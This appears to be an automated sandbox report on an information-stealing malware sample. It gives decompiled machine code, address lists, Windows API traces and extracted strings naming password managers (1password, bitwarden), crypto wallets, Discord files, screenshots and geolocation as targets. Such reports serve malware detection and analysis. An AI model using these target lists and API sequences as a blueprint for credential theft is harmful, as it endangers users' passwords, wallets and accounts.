					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					asm("enter 0x4012, 0x0");
					es = _t196;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t189;
					_t139 = _t137 + 2;
					 *_t139 =  *_t139 + _t139;
					asm("sbb al, 0x40");
					asm("invalid");
					 *_t139 =  *_t139 + 1;
					 *_t139 =  *_t139 + _t139;
					 *_t139 =  *_t139 + _t194;
					 *((intOrPtr*)(_t201 - 0x4cdab710)) =  *((intOrPtr*)(_t201 - 0x4cdab710)) + _t194;
					asm("insd");
					_t198 = _t197 + 1;
					_t191 = _t139 + 2;
					asm("movsb");
					_t143 = _t189 + _t189 ^ _t191;
					 *((char*)(_t194 + _t191 + 0x2000a25)) =  *((char*)(_t194 + _t191 + 0x2000a25)) - 1;
					 *_t196 =  *_t196 + _t143;
					 *_t196 =  *_t196 + _t143;
					 *((intOrPtr*)(_t143 + 0x4016)) =  *((intOrPtr*)(_t143 + 0x4016)) + _t196;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					ss = _t194;
					 *_t194 =  *_t194 + _t194;
					 *_t194 =  *_t194 + _t191;
					_t146 = _t143 + 1;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					 *_t196 =  *_t196 + _t146;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					asm("adc eax, [eax]");
					asm("invalid");
					asm("invalid");
					_t148 = _t146 - 0x17 + 1;
					 *_t148 =  *_t148 + _t148;
					 *_t148 =  *_t148 + _t148;
					 *_t148 =  *_t148 + _t196;
					_t150 = _t148 + 2;
					 *_t150 =  *_t150 + _t150;
					 *_t150 =  *_t150 + _t150;
					 *_t150 =  *_t150 + _t196;
					_pop(ss);
					_t151 = _t150 + 1;
					 *_t194 =  *_t194 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + 1;
					 *_t194 =  *_t194 + _t151;
					 *_t194 =  *_t194;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					_t152 = _t151 + 1;
					_t193 = _t191 + _t191 + _t191 + _t191;
					asm("invalid");
					 *((intOrPtr*)(_t193 + 0x40 + _t194)) =  *((intOrPtr*)(_t193 + 0x40 + _t194)) + 1;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					_t154 = _t152 + 2;
					 *_t154 =  *_t154 + _t154;
					 *_t154 =  *_t154 + _t154;
					 *_t154 =  *_t154 + _t193;
					_pop(ss);
					_t155 = _t154 + 1;
					 *((intOrPtr*)(_t155 + _t155)) =  *((intOrPtr*)(_t155 + _t155)) + _t193;
					 *_t155 =  *_t155 + _t155;
					 *_t155 =  *_t155 + _t155;
					 *_t155 =  *_t155 + _t155;
					asm("invalid");
					 *_t155 =  *_t155 + _t155;
					 *((intOrPtr*)(_t155 + 1)) =  *((intOrPtr*)(_t155 + 1)) + _t155;
					 *_t155 =  *_t155 + _t155;
					_t206 = _t205 - 1;
					asm("outsd");
					if(_t206 != 0) {
						L35:
						_t156 = _t155;
						if(_t156 == 0) {
							_push(0x401764);
							L38:
							_pop(ss);
							_t157 = _t156 + 1;
							 *((intOrPtr*)(_t157 + 0x4011d0)) =  *((intOrPtr*)(_t157 + 0x4011d0)) + _t193;
							_t158 =  *_t157();
							goto __eax;
						}
						goto __eax;
					}
					_t156 = _t155 ^  *[gs:eax];
					_t206 = _t206 - 1;
					asm("outsd");
					if(_t206 != 0) {
						goto L38;
					}
					 *[gs:eax] =  *[gs:eax] ^ _t156;
					_t239 =  *[gs:eax];
					_push(_t196);
					_push(_t196);
					_push(_t210);
					if(_t239 < 0 || _t239 != 0) {
						 *_t158 =  *_t158 + _t158;
						_t246 =  *_t158;
						_push(_t196);
						asm("a16 push ebx");
						if (_t246 == 0) goto L53;
						goto L40;
					} else {
						 *[gs:eax] =  *[gs:eax] + _t156;
						 *((intOrPtr*)(_t156 + _t156)) =  *((intOrPtr*)(_t156 + _t156)) + _t194;
						 *_t156 =  *_t156 | _t156;
						 *_t156 =  *_t156 + _t156;
						 *_t156 =  *_t156 + _t156;
						 *_t156 =  *_t156 + _t156;
						 *_t156 =  *_t156 + _t156;
						_t158 = _t156 | 0x61000000;
						_t240 = _t158;
						if(_t240 <= 0) {
							L40:
							if(_t246 == 0) {
								L53:
								 *((intOrPtr*)(_t158 + _t158)) =  *((intOrPtr*)(_t158 + _t158)) + _t158;
								_t193 = _t193 + 1;
								_t160 = _t158 - 1 + 1;
								 *_t160 =  *_t160 + _t160;
								 *_t160 =  *_t160 + _t160;
								 *_t160 =  *_t160 + _t160;
								 *_t160 =  *_t160 + _t160;
								 *((intOrPtr*)(0x404350 + _t194)) =  *((intOrPtr*)(0x404350 + _t194)) + _t160;
								_t158 =  *0x404350; // 0x0
								L55:
								 *_t193 =  *_t193 + _t194;
								 *(_t196 + _t158 - 1) =  *(_t196 + _t158 - 1) << 0xe0;
							}
							asm("popad");
							asm("insb");
							if(_t246 != 0) {
								goto L55;
							}
							if(_t206 + 1 < 0) {
								_t193 = _t193 - 1;
								if (_t193 >= 0) goto L52;
								_pop(ss);
								_t158 = _t158 + 1 + _t158 + 1 + 1;
								 *_t158 =  *_t158 + _t158;
								goto L53;
							}
							 *_t158 =  *_t158 + _t158;
							L44:
							 *((intOrPtr*)(_t198 + _t196)) =  *((intOrPtr*)(_t198 + _t196)) + _t193;
							 *((intOrPtr*)(_t198 +  &(_t196[0x10]))) =  *((intOrPtr*)(_t198 +  &(_t196[0x10]))) + _t193;
							_t167 = _t158 + 2;
							L45:
							 *_t167 =  *_t167 + _t167;
							 *_t167 =  *_t167 + _t167;
							 *_t167 =  *_t167 + _t167;
							 *_t167 =  *_t167 + _t167;
							L46:
							 *_t167 =  *_t167 + _t167;
							_t168 =  *0x404344; // 0x0
							_t169 = _t168;
							if(_t169 == 0) {
								_push(0x4017ac);
								L50:
								_pop(ss);
								_t170 = _t169 + 1;
								 *((intOrPtr*)(_t170 + 0x4011d0)) =  *((intOrPtr*)(_t170 + 0x4011d0)) + _t193;
								_t158 =  *_t170();
								goto __eax;
							}
							goto __eax;
						}
						if(_t240 < 0) {
							goto L44;
						}
						_t202 = _t201 ^  *_t196;
						asm("fs insb");
						asm("insb");
						 *_t158 =  *_t158 + _t158;
						 *_t158 =  *_t158 + _t158;
						asm("adc [eax], eax");
						 *_t158 =  *_t158 + _t158;
						_t241 =  *_t158;
						_push(_t196);
						asm("a16 push ecx");
						if(_t241 != 0) {
							goto L45;
						}
						if(_t241 < 0) {
							goto L50;
						}
						_push(_t202);
						asm("popad");
						asm("insb");
						if(_t241 != 0) {
							goto L46;
						}
						_t206 = _t206 + 1;
						if(_t206 < 0) {
							goto L40;
						}
						 *_t158 =  *_t158 + _t158;
						 *_t158 =  *_t158 + _t158;
						_t171 = _t158 + 1;
						 *((intOrPtr*)(_t171 + 0x17)) =  *((intOrPtr*)(_t171 + 0x17)) + _t196;
						_t155 = _t171 + 1;
						 *_t155 =  *_t155 + _t155;
						 *((intOrPtr*)(_t155 + _t155)) =  *((intOrPtr*)(_t155 + _t155)) + _t155;
						 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ _t155;
						 *_t155 =  *_t155 + _t155;
						 *_t155 =  *_t155 + _t155;
						 *_t155 =  *_t155 + _t155;
						 *_t155 =  *_t155 + _t155;
						 *((intOrPtr*)(_t194 + 0x404338)) =  *((intOrPtr*)(_t194 + 0x404338)) + _t155;
						goto L35;
					}
				}
				_t205 =  *_t200 * 0x65545252;
				_t224 = _t205;
				if(_t224 < 0 || _t224 != 0) {
					goto L19;
				} else {
					 *[gs:eax] =  *[gs:eax] + _t132;
					_t225 =  *[gs:eax];
					_push(_t196);
					_push(_t196);
					_push(_t210);
					if(_t225 < 0 || _t225 != 0) {
						goto L20;
					} else {
						_t172 = _t196 + _t132;
						 *_t172 =  *_t172 + _t172;
						 *((intOrPtr*)(_t200 +  &(_t196[0x10]))) =  *((intOrPtr*)(_t200 +  &(_t196[0x10]))) + _t189;
						 *_t172 =  *_t172 + _t172;
						 *_t172 =  *_t172 + _t172;
						 *((intOrPtr*)(_t172 + 0x1c)) =  *((intOrPtr*)(_t172 + 0x1c)) + _t196;
						_t173 = _t172 + 1;
						 *((intOrPtr*)(_t173 + 0x2e)) =  *((intOrPtr*)(_t173 + 0x2e)) + _t196;
						_t174 = _t173 + 1;
						 *((intOrPtr*)(_t189 + _t174)) =  *((intOrPtr*)(_t189 + _t174)) + _t189;
						 *_t174 =  *_t174 + _t194;
						_t176 = _t174 + 2;
						_t200[4] = _t200[4] + _t176;
						_t177 = _t176 + 1;
						 *_t177 =  *_t177 + _t177;
						_t179 = _t177 + 2;
						 *_t196 =  *_t196 + _t194;
						 *((intOrPtr*)(_t179 +  &(_t179[0x10]))) =  *((intOrPtr*)(_t179 +  &(_t179[0x10]))) + _t189;
						 *_t189 =  *_t189 + _t179;
						 *_t205 =  *_t205 + _t196;
						if ( *_t205 >= 0) goto L12;
						 *[gs:edx] =  *[gs:edx] + _t196;
						if ( *[gs:edx] >= 0) goto L13;
						 *_t194 = _t179 +  *_t194;
						 *[fs:ebp] =  *[fs:ebp] + _t194;
						_t180 =  *_t179 * 0x5c006e;
						 *_t205 =  *_t205 + _t180;
						if ( *_t205 >= 0) goto L14;
						_t132 =  *_t180 * 0x74;
						 *_t197 =  *_t197 + _t194;
						_t230 =  *_t197;
						goto L15;
					}
				}
			}

0x0040127d
0x00401282
0x00401284
0x00401286
0x00401288
0x0040128a
0x0040128c
0x0040128d
0x0040128f
0x00401291
0x00401293
0x00401297
0x00401298
0x0040129a
0x0040129b
0x0040129c
0x0040129e
0x004012a1
0x004012a4
0x004012a6
0x004012a8
0x004012aa
0x004012ac
0x004012ae
0x004012b0
0x004012b2
0x004012b2
0x004012b4
0x004012b5
0x004012b7
0x004012bc
0x004012bf
0x004012c1
0x004012c3
0x004012c5
0x004012c7
0x004012c9
0x004012cb
0x004012cd
0x004012d0
0x004012d1
0x004012d3
0x004012d5
0x004012d8
0x004012d9
0x004012db
0x004012e1
0x004012e3
0x004012e6
0x004012e7
0x004012e9
0x004012ed
0x004012ee
0x004012ef
0x004012f1
0x004012f3
0x004012fa
0x004012fc
0x004012fe
0x004012ff
0x00401301
0x00401303
0x00401307
0x00401309
0x0040130b
0x0040130d
0x0040130f
0x00401311
0x00401313
0x00401315
0x00401317
0x0040131e
0x0040131f
0x00401321
0x00401323
0x00401329
0x0040132b
0x0040132d
0x0040132d
0x0040132e
0x00401330
0x00401332
0x00401336
0x00401337
0x00401339
0x0040133b
0x0040133f
0x00401341
0x00401343
0x00401345
0x00401347
0x00401349
0x0040134b
0x0040134d
0x00401352
0x00401353
0x00401356
0x00401357
0x00401359
0x0040135b
0x0040135e
0x0040135f
0x00401361
0x00401363
0x00401365
0x00401367
0x00401369
0x0040136b
0x0040136e
0x0040136f
0x00401371
0x00401373
0x00401379
0x0040137c
0x0040137e
0x00401382
0x00401384
0x00401385
0x00401388
0x0040138c
0x0040138d
0x0040138e
0x00401393
0x00401395
0x00401397
0x00401399
0x0040139b
0x0040139d
0x0040139f
0x004013a2
0x004013a4
0x004013a6
0x004013a8
0x004013aa
0x004013ac
0x004013ae
0x004013b0
0x004013b3
0x004013b5
0x004013b7
0x004013ba
0x004013bb
0x004013bd
0x004013bf
0x004013c1
0x004013c4
0x004013c6
0x004013c8
0x004013ca
0x004013cc
0x004013ce
0x004013d0
0x004013d2
0x004013d4
0x004013d9
0x004013dc
0x004013e2
0x004013e3
0x004013e6
0x004013e8
0x004013ea
0x004013ec
0x004013ee
0x004013f0
0x004013f2
0x004013f4
0x004013f6
0x004013f8
0x004013fa
0x004013fc
0x004013fe
0x00401400
0x00401402
0x00401404
0x00401405
0x00401474
0x00401474
0x00401476
0x00401477
0x0040147a
0x0040147c
0x0040147d
0x0040147d
0x00401480
0x00401482
0x00401484
0x00401485
0x00401485
0x00401487
0x0040148a
0x0040148b
0x0040148d
0x0040148f
0x00401490
0x00401490
0x00401491
0x00401497
0x00401499
0x0040149b
0x0040149d
0x004014a1
0x004014a3
0x004014a7
0x004014ab
0x004014ae
0x004014b0
0x004014b1
0x004014b4
0x004014b6
0x004014b8
0x004014b9
0x004014bf
0x004014c1
0x004014c3
0x004014c5
0x004014c7
0x004014c9
0x004014cb
0x004014ce
0x004014d9
0x004014db
0x004014df
0x004014e3
0x004014e3
0x004014e6
0x004014e8
0x004014ea
0x004014ec
0x004014ef
0x004014f2
0x004014f4
0x004014f6
0x004014f8
0x004014fa
0x004014fc
0x004014fe
0x00401500
0x00401502
0x00401504
0x00401506
0x00401508
0x0040150a
0x0040150c
0x0040150e
0x00401510
0x00401512
0x00401514
0x00401516
0x00401518
0x0040151a
0x0040151c
0x0040151e
0x00401520
0x00401522
0x00401524
0x00401526
0x00401528
0x0040152a
0x0040152c
0x0040152e
0x00401530
0x00401532
0x00401534
0x00401536
0x00401538
0x0040153a
0x0040153c
0x0040153e
0x00401540
0x00401542
0x00401544
0x00401546
0x00401548
0x0040154a
0x0040154c
0x0040154e
0x00401550
0x00401552
0x00401554
0x00401556
0x00401558
0x0040155a
0x0040155c
0x0040155e
0x00401560
0x00401562
0x00401564
0x00401566
0x00401568
0x0040156a
0x0040156c
0x0040156e
0x00401570
0x00401572
0x00401574
0x00401576
0x00401578
0x0040157a
0x0040157c
0x0040157e
0x00401580
0x00401582
0x00401584
0x00401586
0x00401588
0x0040158a
0x0040158c
0x0040158e
0x00401590
0x00401592
0x00401594
0x00401596
0x00401598
0x0040159a
0x0040159c
0x0040159e
0x004015a0
0x004015a2
0x004015a4
0x004015a6
0x004015a8
0x004015aa
0x004015ac
0x004015ae
0x004015b0
0x004015b2
0x004015b4
0x004015b6
0x004015b8
0x004015ba
0x004015bc
0x004015be
0x004015c0
0x004015c2
0x004015c4
0x004015c6
0x004015c8
0x004015ca
0x004015cc
0x004015ce
0x004015d0
0x004015d2
0x004015d4
0x004015d6
0x004015d8
0x004015da
0x004015dc
0x004015de
0x004015e0
0x004015e2
0x004015e4
0x004015e6
0x004015e8
0x004015ea
0x004015ec
0x004015ee
0x004015f0
0x004015f2
0x004015f4
0x004015f6
0x004015f8
0x004015fa
0x004015fc
0x004015fe
0x00401600
0x00401602
0x00401604
0x00401606
0x00401608
0x0040160a
0x0040160c
0x0040160e
0x00401610
0x00401612
0x00401614
0x00401616
0x00401618
0x0040161a
0x0040161c
0x0040161e
0x00401620
0x00401622
0x00401624
0x00401626
0x00401628
0x0040162a
0x0040162c
0x0040162e
0x00401630
0x00401632
0x00401634
0x00401636
0x00401638
0x0040163a
0x0040163c
0x0040163e
0x00401640
0x00401642
0x00401644
0x00401646
0x00401648
0x0040164a
0x0040164c
0x0040164e
0x00401650
0x00401652
0x00401654
0x00401658
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401662
0x00401663
0x00401665
0x00401669
0x0040166b
0x0040166d
0x0040166f
0x00401673
0x00401679
0x0040167b
0x0040167c
0x0040167d
0x0040167e
0x00401680
0x00401687
0x00401689
0x0040168b
0x00401691
0x00401693
0x00401695
0x00401697
0x00401699
0x0040169b
0x0040169d
0x0040169f
0x004016a3
0x004016a5
0x004016a7
0x004016a9
0x004016ab
0x004016ad
0x004016af
0x004016b1
0x004016b4
0x004016b6
0x004016ba
0x004016bb
0x004016bd
0x004016bf
0x004016c2
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016ca
0x004016cb
0x004016cd
0x004016cf
0x004016d1
0x004016d5
0x004016d7
0x004016d9
0x004016dc
0x004016de
0x004016e2
0x004016e3
0x004016e5
0x004016e7
0x004016eb
0x004016ed
0x004016ef
0x004016f2
0x004016f3
0x004016f5
0x004016f7
0x004016f9
0x004016fa
0x004016fb
0x004016fe
0x00401700
0x00401702
0x00401704
0x00401706
0x00401708
0x0040170e
0x00401710
0x00401711
0x00401712
0x00401781
0x00401781
0x00401783
0x00401787
0x00401789
0x00401789
0x0040178a
0x0040178b
0x00401791
0x00401793
0x00401793
0x00401785
0x00401785
0x00401715
0x00401718
0x00401719
0x0040171a
0x00000000
0x00000000
0x0040171d
0x0040171d
0x00401720
0x00401721
0x00401722
0x00401723
0x0040179a
0x0040179a
0x0040179c
0x0040179d
0x004017a0
0x00000000
0x00401728
0x00401728
0x0040172b
0x0040172e
0x00401730
0x00401732
0x00401734
0x00401736
0x00401738
0x00401738
0x0040173d
0x004017a1
0x004017a1
0x004017f9
0x004017f9
0x004017fd
0x004017fe
0x004017ff
0x00401801
0x00401803
0x00401805
0x00401807
0x00401808
0x0040180c
0x0040180c
0x0040180e
0x0040180e
0x004017a3
0x004017a4
0x004017a5
0x00000000
0x00000000
0x004017a8
0x004017eb
0x004017ed
0x004017f5
0x004017f6
0x004017f7
0x00000000
0x004017f7
0x004017aa
0x004017ab
0x004017ab
0x004017af
0x004017ba
0x004017bb
0x004017bb
0x004017bd
0x004017bf
0x004017c1
0x004017c2
0x004017c2
0x004017c4
0x004017c9
0x004017cb
0x004017cf
0x004017d1
0x004017d1
0x004017d2
0x004017d3
0x004017d9
0x004017db
0x004017db
0x004017cd
0x004017cd
0x00401740
0x00000000
0x00000000
0x00401742
0x00401744
0x00401747
0x00401748
0x0040174a
0x0040174c
0x0040174e
0x0040174e
0x00401750
0x00401751
0x00401754
0x00000000
0x00000000
0x00401756
0x00000000
0x00000000
0x00401758
0x00401759
0x0040175a
0x0040175b
0x00000000
0x00000000
0x0040175d
0x0040175e
0x00000000
0x00000000
0x00401760
0x00401762
0x00401766
0x00401767
0x0040176a
0x0040176b
0x0040176d
0x00401770
0x00401773
0x00401775
0x00401777
0x00401779
0x0040177b
0x00000000
0x0040177b
0x00401723
0x00401408
0x00401408
0x0040140f
0x00000000
0x00401413
0x00401413
0x00401413
0x00401416
0x00401417
0x00401418
0x00401419
0x00000000
0x0040141e
0x0040141e
0x00401421
0x00401423
0x00401427
0x00401429
0x0040142b
0x0040142e
0x0040142f
0x00401432
0x00401433
0x00401437
0x0040143a
0x0040143b
0x0040143e
0x0040143f
0x00401442
0x00401443
0x00401445
0x00401449
0x0040144f
0x00401452
0x00401454
0x00401458
0x0040145b
0x0040145e
0x00401462
0x00401469
0x0040146c
0x0040146e
0x00401471
0x00401471
0x00000000
0x00401471
0x00401419

APIs

#100.MSVBVM60(0040138C), ref: 0040127D

Memory Dump Source

Source File: 0000001A.00000002.392329179.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.391896707.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.392636917.0000000000404000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.392683542.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 9b3c68db70cb658cd46675113d1397903124ba5c29da548f47889c1b0315f0f2
Instruction ID: c5a21d82802158fab81438b3e418b8b1ced1607d7a22cba123809fe770ff09ea
Opcode Fuzzy Hash: 9b3c68db70cb658cd46675113d1397903124ba5c29da548f47889c1b0315f0f2
Instruction Fuzzy Hash: EF212C6088F3D25FD32353B44C654A57FB09C5362531E02DBD8C2DA0E3D29C184EC362

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: B483.exe PID: 492 Parent PID: 3292 B483.exeCOMMON

Executed Functions

Function 0042B4DB, Relevance: 179.7, APIs: 34, Strings: 65, Instructions: 6436threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B4E0
CoInitialize.OLE32(00000000), ref: 0042B4FC

Part of subcall function 00435146: OpenMutexA.KERNEL32 ref: 00435191
Part of subcall function 00435146: CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 0043519E

CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00431A7C

Part of subcall function 00437E98: GetCurrentProcess.KERNEL32(00000008,?), ref: 00437EAA
Part of subcall function 00437E98: OpenProcessToken.ADVAPI32(00000000), ref: 00437EB1
Part of subcall function 00437E98: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437ECB
Part of subcall function 00437E98: GetLastError.KERNEL32 ref: 00437ED5
Part of subcall function 00437E98: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437EE5
Part of subcall function 00437E98: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437EF9
Part of subcall function 00437E98: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437F0D
Part of subcall function 00437E98: GlobalFree.KERNEL32 ref: 00437F2D

GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042B540
GetLocaleInfoA.KERNEL32(00000000), ref: 0042B547

Part of subcall function 00437F3D: __EH_prolog.LIBCMT ref: 00437F42
Part of subcall function 00437F3D: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00437FA6
Part of subcall function 00437F3D: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00437FC0
Part of subcall function 00437F3D: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438034
Part of subcall function 00437F3D: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438046
Part of subcall function 00437F3D: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438061
Part of subcall function 00437F3D: CloseHandle.KERNEL32(?,?,?,00000000), ref: 0043806E
Part of subcall function 00437F3D: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438081

Part of subcall function 0041457B: __EH_prolog.LIBCMT ref: 00414580

Sleep.KERNEL32(00001388,0047835B), ref: 0042BAD5

Part of subcall function 00434910: __EH_prolog.LIBCMT ref: 00434915

GetUserNameA.ADVAPI32(?,00000101), ref: 0042BCB7

Part of subcall function 0043481D: __EH_prolog.LIBCMT ref: 00434822
Part of subcall function 0043481D: _strcat.LIBCMT ref: 0043487D

Sleep.KERNEL32(00007530), ref: 0042BE6E

Part of subcall function 00422891: __EH_prolog.LIBCMT ref: 00422896

_strlen.LIBCMT ref: 0042BF94
_strlen.LIBCMT ref: 0042BFAE
CreateThread.KERNEL32(00000000,00000000,Function_00016455,00000000,00000000,00000000), ref: 0042C1F2
CreateThread.KERNEL32(00000000,00000000,Function_0001AC93,00000000,00000000,00000000), ref: 0042C204
StrToIntA.SHLWAPI(00000000,00000000), ref: 0042C346

Part of subcall function 00434CBE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434D0A

Part of subcall function 0043350F: __EH_prolog.LIBCMT ref: 00433514
Part of subcall function 0043350F: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,aD1rF3aM8r,0000000F,004875D0), ref: 00433552
Part of subcall function 0043350F: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00433576

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

CreateThread.KERNEL32(00000000,00000000,Function_000299A0,00000000,00000000,00000000), ref: 0042C661
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042C66A
CreateThread.KERNEL32(00000000,00000000,Function_0001AB1E,00000000,00000000,00000000), ref: 0042C216

Part of subcall function 00431CDC: __EH_prolog.LIBCMT ref: 00431CE1

Part of subcall function 00428808: __EH_prolog.LIBCMT ref: 0042880D

Part of subcall function 00437D73: __EH_prolog.LIBCMT ref: 00437D78

Strings

cij, xrefs: 0042B668
qSVdAbi/K2pP5PzejMhd4MMaG67HQMChyp0Mug== , xrefs: 0042B7FF
T, xrefs: 0042F08F
(, xrefs: 0042C85B
), xrefs: 0042CAB5
7, xrefs: 0042F1CF
r, xrefs: 0042E9E7
C, xrefs: 0042D39E
_id, xrefs: 004309F5
,gU^, xrefs: 0042B6AE
name, xrefs: 0042DF8B
25ef3d2ceb7c85368a843a6d0ff8291d , xrefs: 0042B822
longitude, xrefs: 0042D262, 0042D282
\, xrefs: 0042DD97
], xrefs: 0042E723
N, xrefs: 00431793
0, xrefs: 0042F850
location, xrefs: 0042CB51, 0042CB59, 0042CC55, 0042CC62, 0042CD7C, 0042CD93, 0042CE68, 0042CE75, 0042CF68, 0042CF7F, 0042D016, 0042D023, 0042D0D7, 0042D0EE, 0042D112, 0042D1E6, 0042D206, 0042D259, 0042D279
$, xrefs: 00430A5A
jQ2zX9qC4e, xrefs: 0042D2D1, 00430CD3, 00430F4B
=, xrefs: 0042F505
GET, xrefs: 0042BA5D, 0042BAF2
O-r, xrefs: 0042BC82
L, xrefs: 0043100B
S, xrefs: 00430B62
1password, xrefs: 00430759
p, xrefs: 0042CDA7
b, xrefs: 0042D4E5
sqlite3.dll, xrefs: 0042C47A, 0042C53E, 0042E137, 00430F8F
sjvw, xrefs: 0042BD7F
|, xrefs: 0042E1E9
.o\CK@GO@, xrefs: 0042B72A
latitude, xrefs: 0042D1EF, 0042D20F
w, xrefs: 0042F6FE
/, xrefs: 0042CB6A
bitwarden, xrefs: 0043063D
O, xrefs: 004318A3
POST, xrefs: 0042BE13
., xrefs: 0042D034
f, xrefs: 004310B7
k, xrefs: 0042DCC9
\data.json, xrefs: 0043064B
wallets\, xrefs: 0043016F
s{|{, xrefs: 0042B5AF
Q, xrefs: 004316EA
u, xrefs: 0042D7CE
', xrefs: 0042CF90
8, xrefs: 0042FA1B
", xrefs: 004318B3
#!, xrefs: 0042B761
|, xrefs: 004315D0
Z, xrefs: 0042CE89
eL4nZ5eH2n, xrefs: 0042F9F6, 0042FB9A
L, xrefs: 0042B98B
%wPVVLDK, xrefs: 0042B578
KUV, xrefs: 0042B6B8
screen.jpeg, xrefs: 004300CB
discord_files\, xrefs: 004303D8
aD1rF3aM8r, xrefs: 0042C670, 0042C6CB, 00430E14
zip, xrefs: 0042D0F7, 0042D11F
x, xrefs: 0042FBF6
G, xrefs: 0042F37B
S, xrefs: 0042DBEF
s|, xrefs: 0042B5BB
pzQcSfmwN3Ne4qWDyJ9BsZwNU7GZHpOvnJAE6R+bGrIOVU1J1SMZOw== , xrefs: 0042B80F

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
String ID: "$#!$$$%wPVVLDK$'$($)$,gU^$.$.o\CK@GO@$/$0$1password$25ef3d2ceb7c85368a843a6d0ff8291d $7$8$=$C$G$GET$KUV$L$L$N$O$O-r$POST$Q$S$S$T$Z$\$\data.json$]$_id$aD1rF3aM8r$b$bitwarden$cij$discord_files\$eL4nZ5eH2n$f$jQ2zX9qC4e$k$latitude$location$longitude$name$p$pzQcSfmwN3Ne4qWDyJ9BsZwNU7GZHpOvnJAE6R+bGrIOVU1J1SMZOw== $qSVdAbi/K2pP5PzejMhd4MMaG67HQMChyp0Mug== $r$screen.jpeg$sjvw$sqlite3.dll$s{|{$s|$u$w$wallets\$x$zip$|$|
API String ID: 376243089-3529155165
Opcode ID: 3a52f4d07fb47dd401600d522a9c9fee0b351fb1cc7b0ab6d0160a2927cb669c
Instruction ID: e94ce00122e4fa82846bea0862bbb1fd7594c71135c77926f87034a1b964e660
Opcode Fuzzy Hash: 3a52f4d07fb47dd401600d522a9c9fee0b351fb1cc7b0ab6d0160a2927cb669c
Instruction Fuzzy Hash: 1AD37D30D052689ACF25E7A5DC62BEDBB75AF25304F4040DEA449732C2DE786BC8CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433115, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 303COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043311A
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047835B,00000000), ref: 00433168
